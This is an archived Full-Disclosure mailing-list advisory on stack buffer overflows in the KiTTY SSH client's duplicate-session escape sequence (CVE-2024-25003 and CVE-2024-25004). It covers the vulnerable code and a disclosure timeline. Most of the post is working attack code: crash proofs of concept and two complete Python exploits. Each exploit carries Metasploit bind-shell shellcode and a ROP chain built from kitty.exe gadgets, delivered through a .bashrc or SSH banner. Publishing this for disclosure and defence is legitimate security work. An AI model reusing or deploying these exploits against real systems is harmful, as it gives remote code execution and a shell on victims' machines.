lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <IVwG-pJVHFkhgHlnwgPHtr06kaDb7sDmq5BUJ-ba5NjaZWgcAJvuqyBS8p6HobfUn6I-fpYCVv0FGI1UL21np5nHFK6qAaSEfh46MgqKH74=@defcesco.io>
Date: Wed, 07 Feb 2024 18:00:06 +0000
From: Austin DeFrancesco via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Buffer Overflow Vulnerabilities in KiTTY Start Duplicated
	Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004)
	Variables

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables
=================================================================================================================================

Contents:
---------

Summary

Analysis

Exploitation

Acknowledgments

Timeline

Additional Advisory

Summary:
--------

Austin A. DeFrancesco (DEFCESCO) discovered two stack-based buffer overflow vulnerabilities in KiTTY (https://github.com/cyd01/KiTTY/). These vulnerabilities:

-   Are exploitable by any KiTTY user connecting to a host with the embedded exploit;
-   The vulnerabilities were introduced in the original release in May 2021 (commit 4f79b1e) and affect all versions up to KiTTY ≤ 0.76.1.13 in their default configuration.

Austin developed an exploit for these vulnerabilities and obtained remote code execution in the context of the user running the application; by default, KiTTY can be operated in the user permission group of Standard Users. These exploits are stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.

Analysis:
---------

CVE-2024-25003 and CVE-2024-25004 buffer overflow vulnerabilities are in `kitty.c`. The vulnerable lines of code are on lines `2597-2602`; in the latest revision `75fa2abcd220c172` (https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2597-L2602).

If KiTTY encounters the ANSI escape sequence `\\033]0;__dt` in a stream, it interprets it as an instruction to create a duplicate terminal session:

-   `\\033`: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape sequence.
-   `]0;`: This sequence part indicates a metacommand will be defined.
-   `__dt`: This is the vulnerable KiTTY command to duplicate the terminal, which takes inputs of hostname and username.
-   `\\077`: This is the terminator sequence to indicate the end of the escape sequence.
-   KiTTY’s `kitty.c` `__dt` command checks if the first three characters of the string `cmd` are `d`, `t`, and `:`, respectively.

If the condition is true (at line 2596), an array `host` and `user` will be declared with a size of 1024 and 256 (at line 2597), respectively, and initialized with an empty string.

CVE-2024-25003, where the hostname is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.

CVE-2024-25004, where the username is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.

Because `RemotePath` is created from a size calculated at runtime, `RemotePath` is not vulnerable to an overflow. It should be noted that `RemotePath` may be a `NULL` pointer if the allocation fails.

1.  `strcpy(host, cmd + 3);` copies the substring of `cmd` starting from the 4th character (index 3) into the `host` array (at line 2601).
2.  `i = poss(":", host);` assumes there’s a function `poss` that finds the position of the `:` character in the `host` string and assigns it to the variable `i` (at line 2601).
3.  `strcpy(user, host + i);` copies the substring of `host` starting from the position after `:` into the `user` array (at line 2602).

2596 if( (cmd[0]=='d')&&(cmd[1]=='t')&&(cmd[2]==':') ) { // __dt: start a duplicated session in same directory, same host and same user : dt() { printf "\033]0;__dt:"$(hostname)":"${USER}":"`pwd`"\007" ; } 2597 char host[1024]="";char user[256]=""; 2598 int i; 2599 if( RemotePath!= NULL ) free( RemotePath ) ; 2600 RemotePath = (char*) malloc( strlen( cmd ) - 2 ) ; 2601 strcpy(host,cmd+3);i=poss(":",host); 2602 strcpy(user,host+i);

Exploitation:
-------------

### __dt Hostname & Username Buffer Overflows:

>From an attacker’s point of view, the exploits for CVE-2024-25003 and CVE-2024-25004 can be inserted into the `.bashrc` file for all users or in the SSH warning/message of the day (MOTD) banner. The exploit(s) will trigger once the user logs in or is presented with the SSH warning/MOTD banner.

    HOSTNAME CRASH:
    (47c.23ac): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000001 ebx=41414141 ecx=861615a9 edx=01130000 esi=41414141 edi=41414141
    eip=41414141 esp=0084e790 ebp=41414141 iopl=0         nv up ei pl nz na po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
    41414141 ??              ???
    

    USERNAME CRASH:
    (af8.ab0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000001 ebx=41414141 ecx=02f92491 edx=01120000 esi=41414141 edi=41414141
    eip=41414141 esp=0084e790 ebp=41414141 iopl=0         nv up ei pl nz na po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
    41414141 ??              ???
    

KiTTY’s `__dt` function crashed (at line 2601) because adjacent memory was overwritten.

To reproduce the vulnerability, follow these steps:

1.  Start KiTTY and start an SSH session.
2.  Save the proof of concept (PoC) on the connected SSH session.
3.  Execute the PoC(s) using Python: `python3 developer_CVE-2024-25003.py` or `python3 developer_CVE-2024-25004`.

    #!/usr/bin/python
    
    #-------------------------------------------------------------------------------------#
    # Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start               #
    #        Duplicated Session Hostname Variable (CVE-2024-25003)                        #
    # OS: Microsoft Windows 11/10/8/7/XP                                                  #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                            #
    # Software:                                                                           #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
    #-------------------------------------------------------------------------------------#
    
    import sys
    import os
    
    sequence = b'A' * 1309 
    
    escape_sequence = b'\\033]0;__dt:' + sequence + b'\\007'
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()
    

    #!/usr/bin/python
    
    #-------------------------------------------------------------------------------------#
    # Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start               #
    #        Duplicated Session Username Variable (CVE-2024-25004)                        #
    # OS: Microsoft Windows 11/10/8/7/XP                                                  #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                            #
    # Software:                                                                           #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
    #-------------------------------------------------------------------------------------#
    
    import sys
    import os
    
    sequence = b'A' * 1309 
    
    escape_sequence = b'\\033]0;__dt:localhost:' + sequence + b'\\007'
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()
    

### Exploits:

To reproduce these exploits, follow these steps:

1.  Start KiTTY and start an SSH session.
2.  Save the proof of concept exploit(s) on the connected SSH session.
3.  Update the payload handler and payload documented in the exploit’s comments.
4.  Execute the exploit(s) using Python: `python3 CVE-2024-25003.py` or `python3 CVE-2024-25004.py`.

    #!/usr/bin/python
    
    #-------------------------------------------------------------------------------------#
    # Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start             #
    #        Duplicated Session Hostname Variable (CVE-2024-25003)                        #
    # OS: Microsoft Windows 11/10/8/7/XP                                                  #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                            #
    # Software:                                                                           #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
    #-------------------------------------------------------------------------------------#
    # More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY>          #
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
    # [*] Payload Handler Started as Job 1                                                #
    # msf6 payload(windows/shell_bind_tcp) >                                              #
    # [*] Started bind TCP handler against 192.168.100.28:4444                            #
    # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444)   # 
    #-------------------------------------------------------------------------------------#
    
    import sys
    import os
    import struct
    
    #---------------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > generate -b '\\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x3A\\x40' -f py #
    # windows/shell_bind_tcp - 375 bytes                                                          #
    # <https://metasploit.com/>                                                                     #
    # Encoder: x86/xor_poly                                                                       #
    # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                            #
    # PrependMigrate=false, EXITFUNC=process, CreateSession=true,                                 #
    # AutoVerifySession=true                                                                      #
    #---------------------------------------------------------------------------------------------#
    
    buf =  b""
    buf += b"\\x51\\x53\\x56\\x57\\xdb\\xd9\\xd9\\x74\\x24\\xf4\\x5f\\x41"
    buf += b"\\x49\\x31\\xc9\\x51\\x59\\x90\\x90\\x81\\xe9\\xae\\xff\\xff"
    buf += b"\\xff\\xbe\\xd4\\xa1\\xc4\\xf4\\x31\\x77\\x2b\\x83\\xef\\xfc"
    buf += b"\\x51\\x59\\x90\\xff\\xc9\\x75\\xf3\\x5f\\x5e\\x5b\\x59\\x28"
    buf += b"\\x49\\x46\\xf4\\xd4\\xa1\\xa4\\x7d\\x31\\x90\\x04\\x90\\x5f"
    buf += b"\\xf1\\xf4\\x7f\\x86\\xad\\x4f\\xa6\\xc0\\x2a\\xb6\\xdc\\xdb"
    buf += b"\\x16\\x8e\\xd2\\xe5\\x5e\\x68\\xc8\\xb5\\xdd\\xc6\\xd8\\xf4"
    buf += b"\\x60\\x0b\\xf9\\xd5\\x66\\x26\\x06\\x86\\xf6\\x4f\\xa6\\xc4"
    buf += b"\\x2a\\x8e\\xc8\\x5f\\xed\\xd5\\x8c\\x37\\xe9\\xc5\\x25\\x85"
    buf += b"\\x2a\\x9d\\xd4\\xd5\\x72\\x4f\\xbd\\xcc\\x42\\xfe\\xbd\\x5f"
    buf += b"\\x95\\x4f\\xf5\\x02\\x90\\x3b\\x58\\x15\\x6e\\xc9\\xf5\\x13"
    buf += b"\\x99\\x24\\x81\\x22\\xa2\\xb9\\x0c\\xef\\xdc\\xe0\\x81\\x30"
    buf += b"\\xf9\\x4f\\xac\\xf0\\xa0\\x17\\x92\\x5f\\xad\\x8f\\x7f\\x8c"
    buf += b"\\xbd\\xc5\\x27\\x5f\\xa5\\x4f\\xf5\\x04\\x28\\x80\\xd0\\xf0"
    buf += b"\\xfa\\x9f\\x95\\x8d\\xfb\\x95\\x0b\\x34\\xfe\\x9b\\xae\\x5f"
    buf += b"\\xb3\\x2f\\x79\\x89\\xc9\\xf7\\xc6\\xd4\\xa1\\xac\\x83\\xa7"
    buf += b"\\x93\\x9b\\xa0\\xbc\\xed\\xb3\\xd2\\xd3\\x5e\\x11\\x4c\\x44"
    buf += b"\\xa0\\xc4\\xf4\\xfd\\x65\\x90\\xa4\\xbc\\x88\\x44\\x9f\\xd4"
    buf += b"\\x5e\\x11\\x9e\\xdc\\xf8\\x94\\x16\\x29\\xe1\\x94\\xb4\\x84"
    buf += b"\\xc9\\x2e\\xfb\\x0b\\x41\\x3b\\x21\\x43\\xc9\\xc6\\xf4\\xc5"
    buf += b"\\xfd\\x4d\\x12\\xbe\\xb1\\x92\\xa3\\xbc\\x63\\x1f\\xc3\\xb3"
    buf += b"\\x5e\\x11\\xa3\\xbc\\x16\\x2d\\xcc\\x2b\\x5e\\x11\\xa3\\xbc"
    buf += b"\\xd5\\x28\\xcf\\x35\\x5e\\x11\\xa3\\x43\\xc9\\xb1\\x9a\\x99"
    buf += b"\\xc0\\x3b\\x21\\xbc\\xc2\\xa9\\x90\\xd4\\x28\\x27\\xa3\\x83"
    buf += b"\\xf6\\xf5\\x02\\xbe\\xb3\\x9d\\xa2\\x36\\x5c\\xa2\\x33\\x90"
    buf += b"\\x85\\xf8\\xf5\\xd5\\x2c\\x80\\xd0\\xc4\\x67\\xc4\\xb0\\x80"
    buf += b"\\xf1\\x92\\xa2\\x82\\xe7\\x92\\xba\\x82\\xf7\\x97\\xa2\\xbc"
    buf += b"\\xd8\\x08\\xcb\\x52\\x5e\\x11\\x7d\\x34\\xef\\x92\\xb2\\x2b"
    buf += b"\\x91\\xac\\xfc\\x53\\xbc\\xa4\\x0b\\x01\\x1a\\x34\\x41\\x76"
    buf += b"\\xf7\\xac\\x52\\x41\\x1c\\x59\\x0b\\x01\\x9d\\xc2\\x88\\xde"
    buf += b"\\x21\\x3f\\x14\\xa1\\xa4\\x7f\\xb3\\xc7\\xd3\\xab\\x9e\\xd4"
    buf += b"\\xf2\\x3b\\x21"
    
    def shellcode():
    	sc = b''
    	sc += b'\\xBB\\x44\\x24\\x44\\x44' # mov    ebx,0x44442444
    	sc += b'\\xB8\\x44\\x44\\x44\\x44' # mov    eax,0x44444444
    	sc += b'\\x29\\xD8'             # sub    eax,ebx
    	sc += b'\\x29\\xC4'             # sub    esp,eax
    	sc += buf
    	sc += b'\\x90' * (1052-len(sc))
    	assert len(sc) == 1052 
    	return sc
    
    def create_rop_chain():
    
    	# rop chain generated with mona.py - www.corelan.be
    	rop_gadgets = [
    	#[---INFO:gadgets_to_set_esi:---]
    	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
    	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
    	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
    	#[---INFO:gadgets_to_set_ebp:---]
    	0x00429953,  # POP EBP # RETN [kitty.exe]
    	0x005405b0, # push esp; ret 0 [kitty.exe]
    	#[---INFO:gadgets_to_set_ebx:---]
    	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
    	0x00000201,  # 0x00000201-> ebx
    	#[---INFO:gadgets_to_set_edx:---]
    	0x00430dce,  # POP EDX # RETN [kitty.exe]
    	0x00000040,  # 0x00000040-> edx
    	#[---INFO:gadgets_to_set_ecx:---]
    	0x005ac58c,  # POP ECX # RETN [kitty.exe]
    	0x004d81d9,  # &Writable location [kitty.exe]
    	#[---INFO:gadgets_to_set_edi:---]
    	0x004fa404,  # POP EDI # RETN [kitty.exe]
    	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
    	#[---INFO:gadgets_to_set_eax:---]
    	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
    	0x90909090,  # nop
    	0x41414141,  # Filler (compensate)
    	#[---INFO:pushad:---]
    	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
    	]
    	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
    
    rop_chain = create_rop_chain()
    
    #----------------------------------------------------------------------------------#
    # Badchars: \\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x3A\\x40                                       #
    # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :                   #
    #   ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
    #   ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}                #
    # Shellcode size at ESP: 1052                                                      #
    #----------------------------------------------------------------------------------#
    
    return_address = struct.pack('<I',  0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}
    
    rop_chain_padding = b'\\x90' * 35 
    nops = b'\\x90' * 88
    
    escape_sequence = b'\\033]0;__dt:' + shellcode() + return_address
    escape_sequence += rop_chain_padding + rop_chain
    escape_sequence += b'\\x90'
    escape_sequence += b"\\xE9\\x2A\\xFA\\xFF\\xFF" #jmp $eip-1490
    escape_sequence += nops + b'\\007'
    
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()
    

    #!/usr/bin/python
    
    #-------------------------------------------------------------------------------------#
    # Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start             #
    #        Duplicated Session Username Variable (CVE-2024-25004)                        #
    # OS: Microsoft Windows 11/10/8/7/XP                                                  #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                            #
    # Software:                                                                           #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
    #-------------------------------------------------------------------------------------#
    # More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY>          #
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
    # [*] Payload Handler Started as Job 1                                                #
    # msf6 payload(windows/shell_bind_tcp) >                                              #
    # [*] Started bind TCP handler against 192.168.100.28:4444                            #
    # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   # 
    #-------------------------------------------------------------------------------------#
    
    import sys
    import os
    import struct
    
    #-------------------------------------------------------------------------------------#
    # msf6 payload(windows/shell_bind_tcp) > generate -b '\\x00\\x07\\x0a\\x0d\\x1b\\x9c' -f py #
    # windows/shell_bind_tcp - 355 bytes                                                  #
    # <https://metasploit.com/>                                                             #
    # Encoder: x86/shikata_ga_nai                                                         #
    # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
    # PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
    # AutoVerifySession=true                                                              #
    #-------------------------------------------------------------------------------------#
    
    buf =  b""
    buf += b"\\xd9\\xe9\\xd9\\x74\\x24\\xf4\\xbd\\xfe\\xb7\\xa4\\x99\\x5e"
    buf += b"\\x29\\xc9\\xb1\\x53\\x83\\xee\\xfc\\x31\\x6e\\x13\\x03\\x90"
    buf += b"\\xa4\\x46\\x6c\\x90\\x23\\x04\\x8f\\x68\\xb4\\x69\\x19\\x8d"
    buf += b"\\x85\\xa9\\x7d\\xc6\\xb6\\x19\\xf5\\x8a\\x3a\\xd1\\x5b\\x3e"
    buf += b"\\xc8\\x97\\x73\\x31\\x79\\x1d\\xa2\\x7c\\x7a\\x0e\\x96\\x1f"
    buf += b"\\xf8\\x4d\\xcb\\xff\\xc1\\x9d\\x1e\\xfe\\x06\\xc3\\xd3\\x52"
    buf += b"\\xde\\x8f\\x46\\x42\\x6b\\xc5\\x5a\\xe9\\x27\\xcb\\xda\\x0e"
    buf += b"\\xff\\xea\\xcb\\x81\\x8b\\xb4\\xcb\\x20\\x5f\\xcd\\x45\\x3a"
    buf += b"\\xbc\\xe8\\x1c\\xb1\\x76\\x86\\x9e\\x13\\x47\\x67\\x0c\\x5a"
    buf += b"\\x67\\x9a\\x4c\\x9b\\x40\\x45\\x3b\\xd5\\xb2\\xf8\\x3c\\x22"
    buf += b"\\xc8\\x26\\xc8\\xb0\\x6a\\xac\\x6a\\x1c\\x8a\\x61\\xec\\xd7"
    buf += b"\\x80\\xce\\x7a\\xbf\\x84\\xd1\\xaf\\xb4\\xb1\\x5a\\x4e\\x1a"
    buf += b"\\x30\\x18\\x75\\xbe\\x18\\xfa\\x14\\xe7\\xc4\\xad\\x29\\xf7"
    buf += b"\\xa6\\x12\\x8c\\x7c\\x4a\\x46\\xbd\\xdf\\x03\\xab\\x8c\\xdf"
    buf += b"\\xd3\\xa3\\x87\\xac\\xe1\\x6c\\x3c\\x3a\\x4a\\xe4\\x9a\\xbd"
    buf += b"\\xad\\xdf\\x5b\\x51\\x50\\xe0\\x9b\\x78\\x97\\xb4\\xcb\\x12"
    buf += b"\\x3e\\xb5\\x87\\xe2\\xbf\\x60\\x3d\\xea\\x66\\xdb\\x20\\x17"
    buf += b"\\xd8\\x8b\\xe4\\xb7\\xb1\\xc1\\xea\\xe8\\xa2\\xe9\\x20\\x81"
    buf += b"\\x4b\\x14\\xcb\\xbc\\xd7\\x91\\x2d\\xd4\\xf7\\xf7\\xe6\\x40"
    buf += b"\\x3a\\x2c\\x3f\\xf7\\x45\\x06\\x17\\x9f\\x0e\\x40\\xa0\\xa0"
    buf += b"\\x8e\\x46\\x86\\x36\\x05\\x85\\x12\\x27\\x1a\\x80\\x32\\x30"
    buf += b"\\x8d\\x5e\\xd3\\x73\\x2f\\x5e\\xfe\\xe3\\xcc\\xcd\\x65\\xf3"
    buf += b"\\x9b\\xed\\x31\\xa4\\xcc\\xc0\\x4b\\x20\\xe1\\x7b\\xe2\\x56"
    buf += b"\\xf8\\x1a\\xcd\\xd2\\x27\\xdf\\xd0\\xdb\\xaa\\x5b\\xf7\\xcb"
    buf += b"\\x72\\x63\\xb3\\xbf\\x2a\\x32\\x6d\\x69\\x8d\\xec\\xdf\\xc3"
    buf += b"\\x47\\x42\\xb6\\x83\\x1e\\xa8\\x09\\xd5\\x1e\\xe5\\xff\\x39"
    buf += b"\\xae\\x50\\x46\\x46\\x1f\\x35\\x4e\\x3f\\x7d\\xa5\\xb1\\xea"
    buf += b"\\xc5\\xd5\\xfb\\xb6\\x6c\\x7e\\xa2\\x23\\x2d\\xe3\\x55\\x9e"
    buf += b"\\x72\\x1a\\xd6\\x2a\\x0b\\xd9\\xc6\\x5f\\x0e\\xa5\\x40\\x8c"
    buf += b"\\x62\\xb6\\x24\\xb2\\xd1\\xb7\\x6c"
    
    def shellcode():
    	sc = b'' 
    	sc += b'\\xBB\\x44\\x24\\x44\\x44' # mov    ebx,0x44442444
    	sc += b'\\xB8\\x44\\x44\\x44\\x44' # mov    eax,0x44444444
    	sc += b'\\x29\\xD8'             # sub    eax,ebx
    	sc += b'\\x29\\xC4'             # sub    esp,eax
    	sc += buf
    	sc += b'\\x90' * (1042-len(sc))
    	assert len(sc) == 1042 
    	return sc
    
    def create_rop_chain():
    	# rop chain generated with mona.py - www.corelan.be
    	rop_gadgets = [
    	#[---INFO:gadgets_to_set_esi:---]
    	0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
    	0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x41414141,  # Filler (compensate)
    	0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
    	0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
    	#[---INFO:gadgets_to_set_ebp:---]
    	0x00429953,  # POP EBP # RETN [kitty.exe]
    	0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
    	#[---INFO:gadgets_to_set_ebx:---]
    	0x0049d9f9,  # POP EBX # RETN [kitty.exe]
    	0x00000201,  # 0x00000201-> ebx
    	#[---INFO:gadgets_to_set_edx:---]
    	0x00430dce,  # POP EDX # RETN [kitty.exe]
    	0x00000040,  # 0x00000040-> edx
    	#[---INFO:gadgets_to_set_ecx:---]
    	0x005ac58c,  # POP ECX # RETN [kitty.exe]
    	0x004d81d9,  # &Writable location [kitty.exe]
    	#[---INFO:gadgets_to_set_edi:---]
    	0x004fa404,  # POP EDI # RETN [kitty.exe]
    	0x005a2001,  # RETN (ROP NOP) [kitty.exe]
    	#[---INFO:gadgets_to_set_eax:---]
    	0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
    	0x90909090,  # nop
    	0x41414141,  # Filler (compensate)
    	#[---INFO:pushad:---]
    	0x005dfbac,  # PUSHAD # RETN [kitty.exe]
    	]
    	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
    
    rop_chain = create_rop_chain()
    
    #----------------------------------------------------------------------------------#
    # Badchars: \\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x9d                                           #
    # Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
    #   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
    #   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
    # Shellcode size at ESP: 1042 bytes                                                #
    #----------------------------------------------------------------------------------#
    
    return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}
    
    rop_chain_padding = b'\\x90' * 27
    nops = b'\\x90' * 88
    
    escape_sequence = b'\\033]0;__dt:localhost:' + shellcode() + return_address
    escape_sequence += rop_chain_padding + rop_chain
    escape_sequence += b'\\xE9\\x3D\\xFA\\xFF\\xFF' # jmp $eip-1471
    escape_sequence += nops + b'\\007'
    
    stdout = os.fdopen(sys.stdout.fileno(), 'wb') 
    stdout.write(escape_sequence)
    stdout.flush()
    

Acknowledgments:
----------------

Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.

Timeline:
---------

2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont; no reply from Cyril.

2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.

2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).

Additional Advisory:
--------------------

CVE-2024-23749 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input: https://blog.defcesco.io/CVE-2024-23749
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail

wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAACUTAP4oIK3jTlaYmcjg7f5yuEMXyOhRrs+SkR7PKd+eOeYlggEAmN3F
HN77fiaSDx9kM7Mqr+uS6M0crP1UO+ZbZGfTVQs=
=d91C
-----END PGP SIGNATURE-----

Download attachment "publickey - austin@...cesco.io - 0x4D9E1D34.asc" of type "application/pgp-keys" (584 bytes)

Download attachment "publickey - austin@...cesco.io - 0x4D9E1D34.asc.sig" of type "application/pgp-signature" (119 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ